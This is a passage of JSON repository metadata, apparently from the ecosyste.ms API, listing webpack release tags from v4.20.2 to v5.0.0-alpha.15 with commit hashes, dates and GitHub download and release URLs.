T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_u